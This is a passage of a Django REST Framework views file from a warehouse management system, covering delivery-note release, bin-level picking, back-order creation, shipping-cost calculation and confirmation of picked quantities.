goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[j].pick_qty + \
bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - \
bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + \
bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + \
bin_can_pick_qty
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
elif dn_need_pick_qty == bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + bin_can_pick_qty
dn_detail_list[i].dn_status = 3
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
break
elif dn_need_pick_qty < bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[j].pick_qty + \
dn_need_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - \
dn_need_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + \
dn_need_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=dn_need_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + dn_need_pick_qty
dn_detail_list[i].dn_status = 3
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
break
else:
break
elif bin_can_pick_qty == 0:
continue
else:
continue
else:
continue
elif can_pick_qty == 0:
if qs[v].back_order_label == False:
goods_qty_change.back_order_stock = goods_qty_change.back_order_stock + dn_detail_list[
i].goods_qty
back_order_goods_volume = round(goods_detail.unit_volume * dn_detail_list[i].goods_qty, 4)
back_order_goods_weight = round(
(goods_detail.goods_weight * dn_detail_list[i].goods_qty) / 1000, 4)
back_order_goods_cost = round(goods_detail.goods_price * dn_detail_list[i].goods_qty, 2)
back_order_list.append(DnDetailModel(dn_code=back_order_dn_code,
dn_status=2,
customer=qs[v].customer,
goods_code=dn_detail_list[i].goods_code,
goods_qty=dn_detail_list[i].goods_qty,
goods_weight=back_order_goods_weight,
goods_volume=back_order_goods_volume,
goods_cost=back_order_goods_cost,
creater=self.request.auth.name,
back_order_label=True,
openid=self.request.auth.openid,
create_time=dn_detail_list[i].create_time))
back_order_list_label = 1
total_weight = total_weight - back_order_goods_weight
total_volume = total_volume - back_order_goods_volume
total_cost = total_cost - back_order_goods_cost
back_order_goods_weight_list.append(back_order_goods_weight)
back_order_goods_volume_list.append(back_order_goods_volume)
back_order_goods_cost_list.append(back_order_goods_cost)
dn_detail_list[i].is_delete = True
dn_detail_list[i].save()
goods_qty_change.save()
else:
continue
else:
continue
if picking_list_label == 1:
if back_order_list_label == 1:
back_order_total_volume = sumOfList(back_order_goods_volume_list,
len(back_order_goods_volume_list))
back_order_total_weight = sumOfList(back_order_goods_weight_list,
len(back_order_goods_weight_list))
back_order_total_cost = sumOfList(back_order_goods_cost_list,
len(back_order_goods_cost_list))
customer_city = customer.objects.filter(openid=self.request.auth.openid,
customer_name=str(qs[v].customer),
is_delete=False).first().customer_city
warehouse_city = warehouse.objects.filter(
openid=self.request.auth.openid).first().warehouse_city
transportation_fee = transportation.objects.filter(
Q(openid=self.request.auth.openid, send_city__icontains=warehouse_city,
receiver_city__icontains=customer_city,
is_delete=False) | Q(openid='init_data', send_city__icontains=warehouse_city,
receiver_city__icontains=customer_city,
is_delete=False))
transportation_res = {
"detail": []
}
transportation_back_order_res = {
"detail": []
}
if len(transportation_fee) >= 1:
transportation_list = []
transportation_back_order_list = []
for k in range(len(transportation_fee)):
transportation_cost = transportation_calculate(total_weight,
total_volume,
transportation_fee[k].weight_fee,
transportation_fee[k].volume_fee,
transportation_fee[k].min_payment)
transportation_back_order_cost = transportation_calculate(back_order_total_weight,
back_order_total_volume,
transportation_fee[
k].weight_fee,
transportation_fee[
k].volume_fee,
transportation_fee[
k].min_payment)
transportation_detail = {
"transportation_supplier": transportation_fee[k].transportation_supplier,
"transportation_cost": transportation_cost
}
transportation_back_order_detail = {
"transportation_supplier": transportation_fee[k].transportation_supplier,
"transportation_cost": transportation_back_order_cost
}
transportation_list.append(transportation_detail)
transportation_back_order_list.append(transportation_back_order_detail)
transportation_res['detail'] = transportation_list
transportation_back_order_res['detail'] = transportation_back_order_list
DnListModel.objects.create(openid=self.request.auth.openid,
dn_code=back_order_dn_code,
dn_status=2,
total_weight=back_order_total_weight,
total_volume=back_order_total_volume,
total_cost=back_order_total_cost,
customer=qs[v].customer,
creater=self.request.auth.name,
bar_code=bar_code,
back_order_label=True,
transportation_fee=transportation_back_order_res,
create_time=qs[v].create_time)
scanner.objects.create(openid=self.request.auth.openid, mode="DN", code=back_order_dn_code,
bar_code=bar_code)
PickingListModel.objects.bulk_create(picking_list, batch_size=100)
DnDetailModel.objects.bulk_create(back_order_list, batch_size=100)
qs[v].total_weight = total_weight
qs[v].total_volume = total_volume
qs[v].total_cost = total_cost
qs[v].transportation_fee = transportation_res
qs[v].dn_status = 3
qs[v].save()
elif back_order_list_label == 0:
PickingListModel.objects.bulk_create(picking_list, batch_size=100)
qs[v].dn_status = 3
qs[v].save()
else:
continue
elif picking_list_label == 0:
if back_order_list_label == 1:
DnDetailModel.objects.bulk_create(back_order_list, batch_size=100)
DnListModel.objects.create(openid=self.request.auth.openid,
dn_code=back_order_dn_code,
dn_status=2,
total_weight=qs[v].total_weight,
total_volume=qs[v].total_volume,
total_cost=qs[v].total_cost,
customer=qs[v].customer,
creater=self.request.auth.name,
bar_code=bar_code,
back_order_label=True,
transportation_fee=qs[v].transportation_fee,
create_time=qs[v].create_time)
scanner.objects.create(openid=self.request.auth.openid, mode="DN", code=back_order_dn_code,
bar_code=bar_code)
qs[v].is_delete = True
qs[v].dn_status = 3
qs[v].save()
elif back_order_list_label == 0:
continue
else:
continue
else:
continue
return Response({"detail": "success"}, status=200)
def update(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot Release Order Data Which Not Yours"})
else:
if qs.dn_status == 2:
dn_detail_list = DnDetailModel.objects.filter(openid=self.request.auth.openid,
dn_code=qs.dn_code,
dn_status=2, is_delete=False)
picking_list = []
picking_list_label = 0
back_order_list = []
back_order_list_label = 0
back_order_goods_weight_list = []
back_order_goods_volume_list = []
back_order_goods_cost_list = []
back_order_base_code = DnListModel.objects.filter(openid=self.request.auth.openid, is_delete=False).order_by('-id').first().dn_code
dn_last_code = re.findall(r'\d+', str(back_order_base_code), re.IGNORECASE)
back_order_dn_code = 'DN' + str(int(dn_last_code[0]) + 1).zfill(8)
bar_code = Md5.md5(back_order_dn_code)
total_weight = qs.total_weight
total_volume = qs.total_volume
total_cost = qs.total_cost
for i in range(len(dn_detail_list)):
goods_detail = goods.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code),
is_delete=False).first()
if stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code)).exists():
pass
else:
stocklist.objects.create(openid=self.request.auth.openid,
goods_code=str(goods_detail.goods_code),
goods_desc=goods_detail.goods_desc,
dn_stock=int(dn_detail_list[i].goods_qty))
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(
dn_detail_list[i].goods_code)).first()
goods_bin_stock_list = stockbin.objects.filter(openid=self.request.auth.openid,
goods_code=str(dn_detail_list[i].goods_code),
bin_property="Normal").order_by('id')
can_pick_qty = goods_qty_change.onhand_stock - \
goods_qty_change.inspect_stock - \
goods_qty_change.hold_stock - \
goods_qty_change.damage_stock - \
goods_qty_change.pick_stock - \
goods_qty_change.picked_stock
if can_pick_qty > 0:
if dn_detail_list[i].goods_qty > can_pick_qty:
if qs.back_order_label == False:
dn_pick_qty = dn_detail_list[i].pick_qty
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - \
goods_bin_stock_list[j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_pick_qty = dn_pick_qty + bin_can_pick_qty
goods_qty_change.save()
goods_bin_stock_list[j].save()
elif bin_can_pick_qty == 0:
continue
else:
continue
dn_detail_list[i].pick_qty = dn_pick_qty
dn_back_order_qty = dn_detail_list[i].goods_qty - \
dn_detail_list[i].pick_qty - \
dn_detail_list[i].picked_qty
dn_detail_list[i].goods_qty = dn_pick_qty
dn_detail_list[i].dn_status = 3
goods_qty_change.back_order_stock = goods_qty_change.back_order_stock + \
dn_back_order_qty
back_order_goods_volume = round(goods_detail.unit_volume * dn_back_order_qty, 4)
back_order_goods_weight = round(
(goods_detail.goods_weight * dn_back_order_qty) / 1000, 4)
back_order_goods_cost = round(goods_detail.goods_price * dn_back_order_qty, 2)
back_order_list.append(DnDetailModel(dn_code=back_order_dn_code,
dn_status=2,
customer=qs.customer,
goods_code=dn_detail_list[i].goods_code,
goods_qty=dn_back_order_qty,
goods_weight=back_order_goods_weight,
goods_volume=back_order_goods_volume,
goods_coste=back_order_goods_cost,
creater=self.request.auth.name,
back_order_label=True,
openid=self.request.auth.openid,
create_time=dn_detail_list[i].create_time))
back_order_list_label = 1
total_weight = total_weight - back_order_goods_weight
total_volume = total_volume - back_order_goods_volume
total_cost = total_cost - back_order_goods_cost
dn_detail_list[i].goods_weight = dn_detail_list[i].goods_weight - \
back_order_goods_weight
dn_detail_list[i].goods_volume = dn_detail_list[i].goods_volume - \
back_order_goods_volume
dn_detail_list[i].goods_cost = dn_detail_list[i].goods_cost - \
back_order_goods_cost
back_order_goods_weight_list.append(back_order_goods_weight)
back_order_goods_volume_list.append(back_order_goods_volume)
back_order_goods_cost_list.append(back_order_goods_cost)
goods_qty_change.save()
dn_detail_list[i].save()
else:
dn_pick_qty = dn_detail_list[i].pick_qty
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - \
goods_bin_stock_list[j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[
j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_pick_qty = dn_pick_qty + bin_can_pick_qty
goods_qty_change.save()
goods_bin_stock_list[j].save()
elif bin_can_pick_qty == 0:
continue
else:
continue
dn_detail_list[i].pick_qty = dn_pick_qty
dn_back_order_qty = dn_detail_list[i].goods_qty - \
dn_detail_list[i].pick_qty - \
dn_detail_list[i].picked_qty
dn_detail_list[i].goods_qty = dn_pick_qty
dn_detail_list[i].dn_status = 3
back_order_goods_volume = round(goods_detail.unit_volume * dn_back_order_qty, 4)
back_order_goods_weight = round(
(goods_detail.goods_weight * dn_back_order_qty) / 1000, 4)
back_order_goods_cost = round(goods_detail.goods_price * dn_back_order_qty, 2)
back_order_list.append(DnDetailModel(dn_code=back_order_dn_code,
dn_status=2,
customer=qs.customer,
goods_code=dn_detail_list[i].goods_code,
goods_qty=dn_back_order_qty,
goods_weight=back_order_goods_weight,
goods_volume=back_order_goods_volume,
goods_cost=back_order_goods_cost,
creater=self.request.auth.name,
back_order_label=True,
openid=self.request.auth.openid,
create_time=dn_detail_list[i].create_time))
back_order_list_label = 1
total_weight = total_weight - back_order_goods_weight
total_volume = total_volume - back_order_goods_volume
total_cost = total_cost - back_order_goods_cost
dn_detail_list[i].goods_weight = dn_detail_list[i].goods_weight - \
back_order_goods_weight
dn_detail_list[i].goods_volume = dn_detail_list[i].goods_volume - \
back_order_goods_volume
dn_detail_list[i].goods_cost = dn_detail_list[i].goods_cost - \
back_order_goods_cost
back_order_goods_weight_list.append(back_order_goods_weight)
back_order_goods_volume_list.append(back_order_goods_volume)
back_order_goods_cost_list.append(back_order_goods_cost)
dn_detail_list[i].save()
elif dn_detail_list[i].goods_qty == can_pick_qty:
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - goods_bin_stock_list[j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
dn_need_pick_qty = dn_detail_list[i].goods_qty - dn_detail_list[i].pick_qty - dn_detail_list[i].picked_qty
if dn_need_pick_qty > bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + bin_can_pick_qty
goods_bin_stock_list[j].save()
goods_qty_change.save()
elif dn_need_pick_qty == bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + bin_can_pick_qty
dn_detail_list[i].dn_status = 3
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
break
else:
break
elif bin_can_pick_qty == 0:
continue
else:
continue
elif dn_detail_list[i].goods_qty < can_pick_qty:
for j in range(len(goods_bin_stock_list)):
bin_can_pick_qty = goods_bin_stock_list[j].goods_qty - \
goods_bin_stock_list[j].pick_qty - \
goods_bin_stock_list[j].picked_qty
if bin_can_pick_qty > 0:
dn_need_pick_qty = dn_detail_list[i].goods_qty - \
dn_detail_list[i].pick_qty - \
dn_detail_list[i].picked_qty
if dn_need_pick_qty > bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[j].pick_qty + \
bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - \
bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + \
bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + \
bin_can_pick_qty
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
elif dn_need_pick_qty == bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[
j].pick_qty + bin_can_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - bin_can_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + bin_can_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[j].goods_code,
pick_qty=bin_can_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + bin_can_pick_qty
dn_detail_list[i].dn_status = 3
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
break
elif dn_need_pick_qty < bin_can_pick_qty:
goods_bin_stock_list[j].pick_qty = goods_bin_stock_list[j].pick_qty + \
dn_need_pick_qty
goods_qty_change.ordered_stock = goods_qty_change.ordered_stock - \
dn_need_pick_qty
goods_qty_change.pick_stock = goods_qty_change.pick_stock + \
dn_need_pick_qty
picking_list.append(PickingListModel(openid=self.request.auth.openid,
dn_code=dn_detail_list[i].dn_code,
bin_name=goods_bin_stock_list[j].bin_name,
goods_code=goods_bin_stock_list[j].goods_code,
pick_qty=dn_need_pick_qty,
creater=self.request.auth.name,
t_code=goods_bin_stock_list[j].t_code))
picking_list_label = 1
dn_detail_list[i].pick_qty = dn_detail_list[i].pick_qty + dn_need_pick_qty
dn_detail_list[i].dn_status = 3
dn_detail_list[i].save()
goods_bin_stock_list[j].save()
goods_qty_change.save()
break
else:
break
elif bin_can_pick_qty == 0:
continue
else:
continue
elif can_pick_qty == 0:
if qs.back_order_label == False:
goods_qty_change.back_order_stock = goods_qty_change.back_order_stock + dn_detail_list[i].goods_qty
back_order_goods_volume = round(goods_detail.unit_volume * dn_detail_list[i].goods_qty, 4)
back_order_goods_weight = round((goods_detail.goods_weight * dn_detail_list[i].goods_qty) / 1000, 4)
back_order_goods_cost = round(goods_detail.goods_price * dn_detail_list[i].goods_qty, 2)
back_order_list.append(DnDetailModel(dn_code=back_order_dn_code,
dn_status=2,
customer=qs.customer,
goods_code=dn_detail_list[i].goods_code,
goods_qty=dn_detail_list[i].goods_qty,
goods_weight=back_order_goods_weight,
goods_volume=back_order_goods_volume,
goods_cost=back_order_goods_cost,
creater=self.request.auth.name,
back_order_label=True,
openid=self.request.auth.openid,
create_time=dn_detail_list[i].create_time))
back_order_list_label = 1
total_weight = total_weight - back_order_goods_weight
total_volume = total_volume - back_order_goods_volume
total_cost = total_cost - back_order_goods_cost
back_order_goods_weight_list.append(back_order_goods_weight)
back_order_goods_volume_list.append(back_order_goods_volume)
back_order_goods_cost_list.append(back_order_goods_cost)
dn_detail_list[i].is_delete = True
dn_detail_list[i].save()
goods_qty_change.save()
else:
continue
else:
continue
if picking_list_label == 1:
if back_order_list_label == 1:
back_order_total_volume = sumOfList(back_order_goods_volume_list,
len(back_order_goods_volume_list))
back_order_total_weight = sumOfList(back_order_goods_weight_list,
len(back_order_goods_weight_list))
back_order_total_cost = sumOfList(back_order_goods_cost_list,
len(back_order_goods_cost_list))
customer_city = customer.objects.filter(openid=self.request.auth.openid,
customer_name=str(qs.customer),
is_delete=False).first().customer_city
warehouse_city = warehouse.objects.filter(
openid=self.request.auth.openid).first().warehouse_city
transportation_fee = transportation.objects.filter(
Q(openid=self.request.auth.openid, send_city__icontains=warehouse_city,
receiver_city__icontains=customer_city,
is_delete=False) | Q(openid='init_data', send_city__icontains=warehouse_city,
receiver_city__icontains=customer_city,
is_delete=False))
transportation_res = {
"detail": []
}
transportation_back_order_res = {
"detail": []
}
if len(transportation_fee) >= 1:
transportation_list = []
transportation_back_order_list = []
for k in range(len(transportation_fee)):
transportation_cost = transportation_calculate(total_weight,
total_volume,
transportation_fee[k].weight_fee,
transportation_fee[k].volume_fee,
transportation_fee[k].min_payment)
transportation_back_order_cost = transportation_calculate(back_order_total_weight,
back_order_total_volume,
transportation_fee[k].weight_fee,
transportation_fee[k].volume_fee,
transportation_fee[k].min_payment)
transportation_detail = {
"transportation_supplier": transportation_fee[k].transportation_supplier,
"transportation_cost": transportation_cost
}
transportation_back_order_detail = {
"transportation_supplier": transportation_fee[k].transportation_supplier,
"transportation_cost": transportation_back_order_cost
}
transportation_list.append(transportation_detail)
transportation_back_order_list.append(transportation_back_order_detail)
transportation_res['detail'] = transportation_list
transportation_back_order_res['detail'] = transportation_back_order_list
DnListModel.objects.create(openid=self.request.auth.openid,
dn_code=back_order_dn_code,
dn_status=2,
total_weight=back_order_total_weight,
total_volume=back_order_total_volume,
total_cost=back_order_total_cost,
customer=qs.customer,
creater=self.request.auth.name,
bar_code=bar_code,
back_order_label=True,
transportation_fee=transportation_back_order_res,
create_time=qs.create_time)
scanner.objects.create(openid=self.request.auth.openid, mode="DN", code=back_order_dn_code,
bar_code=bar_code)
PickingListModel.objects.bulk_create(picking_list, batch_size=100)
DnDetailModel.objects.bulk_create(back_order_list, batch_size=100)
qs.total_weight = total_weight
qs.total_volume = total_volume
qs.total_cost = total_cost
qs.transportation_fee = transportation_res
qs.dn_status = 3
qs.save()
elif back_order_list_label == 0:
PickingListModel.objects.bulk_create(picking_list, batch_size=100)
qs.dn_status = 3
qs.save()
elif picking_list_label == 0:
if back_order_list_label == 1:
DnDetailModel.objects.bulk_create(back_order_list, batch_size=100)
DnListModel.objects.create(openid=self.request.auth.openid,
dn_code=back_order_dn_code,
dn_status=2,
total_weight=qs.total_weight,
total_volume=qs.total_volume,
total_cost=qs.total_cost,
customer=qs.customer,
creater=self.request.auth.name,
bar_code=bar_code,
back_order_label=True,
transportation_fee=qs.transportation_fee,
create_time=qs.create_time)
scanner.objects.create(openid=self.request.auth.openid, mode="DN", code=back_order_dn_code,
bar_code=bar_code)
qs.is_delete = True
qs.dn_status = 3
qs.save()
return Response({"detail": "success"}, status=200)
else:
raise APIException({"detail": "This Order Does Not in Release Status"})
class DnPickingListViewSet(viewsets.ModelViewSet):
"""
retrieve:
Picklist for pk
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['retrieve']:
return serializers.DNListGetSerializer
else:
return self.http_method_not_allowed(request=self.request)
def retrieve(self, request, pk):
qs = self.get_object()
if qs.dn_status < 3:
raise APIException({"detail": "No Picking List Been Created"})
else:
picking_qs = PickingListModel.objects.filter(openid=self.request.auth.openid, dn_code=qs.dn_code)
serializer = serializers.DNPickingListGetSerializer(picking_qs, many=True)
return Response(serializer.data, status=200)
class DnPickingListFilterViewSet(viewsets.ModelViewSet):
"""
list:
Picklist for Filter
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnPickingListFilter
def get_queryset(self):
if self.request.user:
return PickingListModel.objects.filter(openid=self.request.auth.openid)
else:
return PickingListModel.objects.none()
def get_serializer_class(self):
if self.action in ['list']:
return serializers.DNPickingCheckGetSerializer
else:
return self.http_method_not_allowed(request=self.request)
class DnPickedViewSet(viewsets.ModelViewSet):
"""
create:
Finish Picked
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnListModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['create', 'update']:
return serializers.DNListUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
def create(self, request, pk):
qs = self.get_object()
if qs.dn_status != 3:
raise APIException({"detail": "This dn Status Not Pre Pick"})
else:
data = self.request.data
for i in range(len(data['goodsData'])):
pick_qty_change = PickingListModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
t_code=str(data['goodsData'][i].get('t_code'))).first()
if int(data['goodsData'][i].get('pick_qty')) < 0:
raise APIException({"detail": str(data['goodsData'][i].get('goods_code')) + " Picked Qty Must >= 0"})
else:
if int(data['goodsData'][i].get('pick_qty')) > pick_qty_change.pick_qty:
raise APIException({"detail": str(data['goodsData'][i].get('goods_code')) + " Picked Qty Must Less Than Pick Qty"})
else:
continue
qs.dn_status = 4
for j in range(len(data['goodsData'])):
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(data['goodsData'][j].get('goods_code'))).first()
dn_detail = DnDetailModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
customer=str(data['customer']),
goods_code=str(data['goodsData'][j].get('goods_code'))).first()
bin_qty_change = stockbin.objects.filter(openid=self.request.auth.openid,
t_code=str(data['goodsData'][j].get('t_code'))).first()
pick_qty_change = PickingListModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
t_code=str(data['goodsData'][j].get('t_code'))).first()
qtychangerecorder.objects.create(openid=self.request.auth.openid,
mode_code=dn_detail.dn_code,
bin_name=bin_qty_change.bin_name,
goods_code=bin_qty_change.goods_code,
goods_qty=0 - int(data['goodsData'][j].get('pick_qty')),
creater=self.request.auth.name
)
cur_date = timezone.now().date()
bin_stock = stockbin.objects.filter(openid=self.request.auth.openid,
bin_name=bin_qty_change.bin_name,
goods_code=bin_qty_change.goods_code,
).aggregate(sum=Sum('goods_qty'))["sum"]
cycle_qty = bin_stock - int(data['goodsData'][j].get('pick_qty'))
cyclecount.objects.filter(openid=self.request.auth.openid,
bin_name=bin_qty_change.bin_name,
goods_code=bin_qty_change.goods_code,
create_time__gte=cur_date).update(goods_qty=cycle_qty)
if int(data['goodsData'][j].get('pick_qty')) == pick_qty_change.pick_qty:
goods_qty_change.pick_stock = goods_qty_change.pick_stock - int(data['goodsData'][j].get('pick_qty'))
goods_qty_change.picked_stock = goods_qty_change.picked_stock + int(data['goodsData'][j].get('pick_qty'))
pick_qty_change.picked_qty = int(data['goodsData'][j].get('pick_qty'))
bin_qty_change.pick_qty = bin_qty_change.pick_qty - int(data['goodsData'][j].get('pick_qty'))
bin_qty_change.picked_qty = bin_qty_change.picked_qty + int(data['goodsData'][j].get('pick_qty'))
goods_qty_change.save()
pick_qty_change.save()
bin_qty_change.save()
elif int(data['goodsData'][j].get('pick_qty')) < pick_qty_change.pick_qty:
goods_qty_change.pick_stock = goods_qty_change.pick_stock - dn_detail.pick_qty
goods_qty_change.picked_stock = goods_qty_change.picked_stock + int(data['goodsData'][j].get('pick_qty'))
pick_qty_change.picked_qty = int(data['goodsData'][j].get('pick_qty'))
bin_qty_change.pick_qty = bin_qty_change.pick_qty - pick_qty_change.pick_qty
bin_qty_change.picked_qty = bin_qty_change.picked_qty + int(data['goodsData'][j].get('pick_qty'))
goods_qty_change.save()
pick_qty_change.save()
bin_qty_change.save()
dn_detail.picked_qty = dn_detail.picked_qty + int(data['goodsData'][j].get('pick_qty'))
if dn_detail.dn_status == 3:
dn_detail.dn_status = 4
if dn_detail.pick_qty > 0:
dn_detail.pick_qty = 0
dn_detail.save()
qs.save()
return Response({"Detail": "success"}, status=200)
def update(self, request, *args, **kwargs):
data = self.request.data
qs = self.get_queryset().filter(dn_code=data['dn_code']).first()
if qs.dn_status != 3:
raise APIException({"detail": "This dn Status Not Pre Pick"})
else:
for i in range(len(data['goodsData'])):
pick_qty_change = PickingListModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
t_code=str(
data['goodsData'][i].get('t_code'))).first()
if int(data['goodsData'][i].get('pick_qty')) < 0:
raise APIException(
{"detail": str(data['goodsData'][i].get('goods_code')) + " Picked Qty Must >= 0"})
else:
if int(data['goodsData'][i].get('pick_qty')) > pick_qty_change.pick_qty:
raise APIException(
{"detail": str(
data['goodsData'][i].get('goods_code')) + " Picked Qty Must Less Than Pick Qty"})
else:
continue
qs.dn_status = 4
for j in range(len(data['goodsData'])):
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=str(
data['goodsData'][j].get('goods_code'))).first()
dn_detail = DnDetailModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
